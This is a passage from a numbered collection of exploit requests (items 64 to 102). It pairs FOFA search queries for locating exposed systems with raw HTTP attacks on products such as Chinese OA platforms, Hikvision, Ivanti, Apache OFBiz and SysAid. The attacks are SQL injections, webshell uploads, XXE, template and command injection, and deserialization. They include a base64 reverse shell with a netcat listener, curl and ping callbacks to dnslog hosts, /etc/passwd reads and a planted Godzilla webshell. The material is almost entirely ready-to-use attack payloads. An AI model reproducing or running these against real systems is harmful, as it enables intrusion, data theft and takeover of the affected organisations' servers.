User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚 Management Information System (EnjoyRMIS) CWSFinanceCommon SQL injection
FOFA: body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. 优卡特脸爱云 one-face-pass smart management platform 1.0.55.0.0.1 permission bypass
FOFA: title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. Wanhu (万户) ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA: app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

If lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9, the vulnerability is confirmed.

67. Wanhu (万户) ezOFFICE wpsservlet arbitrary file upload
FOFA: app="万户网络-ezOFFICE"
The newdocId and filename parameters set the name of the written file, dir sets the directory it is written to, and fileType sets the file type.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The written file is served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. Wanhu (万户) ezOFFICE wf_printnum.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. Wanhu (万户) ezOFFICE contract_gd.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. Wanhu (万户) ezEIP success command execution
FOFA: app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
FOFA: body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. Seeyon (致远) OA getAjaxDataServlet XXE
FOFA: app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA: icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. Seeyon (致远) M3-server 6_1sp1 deserialization RCE
FOFA: title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA: app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. Newcapec (新开普) campus service management platform service.action remote command execution
FOFA: title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 clothing management software system UploadHandler.ashx arbitrary file upload
FOFA: body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
FOFA: icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE (百为) flow-control router remote command execution
FOFA: BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀 (Superdata) software DesignReportSave.jsp interface arbitrary file upload
FOFA: app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. Uniview (宇视科技) video surveillance main-cgi password leak
FOFA: app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA: app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA: title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA: title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA: body="sysaid-logo-dark-green.png"
The exploit request is shown below; it writes a Godzilla webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Resulting URL: http://x.x.x.x/userfiles/index.jsp

86. Tosei (Japan) self-service laundry machine RCE
FOFA: body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. DBAppSecurity (安恒) 明御 security gateway aaa_local_web_preview file upload
FOFA: title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. DBAppSecurity (安恒) 明御 security gateway aaa_portal_auth_config_reset remote command execution
FOFA: title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. Seeyon (致远互联) FE collaborative office platform editflow_manager SQL injection
FOFA: title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. Hikvision (海康威视) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA: icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. Hikvision (海康威视) integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA: title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. Hikvision (海康威视) operation management center session command execution
Fastjson command execution
hunter: web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. QAX (奇安信) Legendsec (网神) SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. Qi'anxin Wangshen SecGate3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--


GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36


95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>


Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"


Substitute the generated payload into the POC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);


Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"


98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B


99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D


100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--


101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip


102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         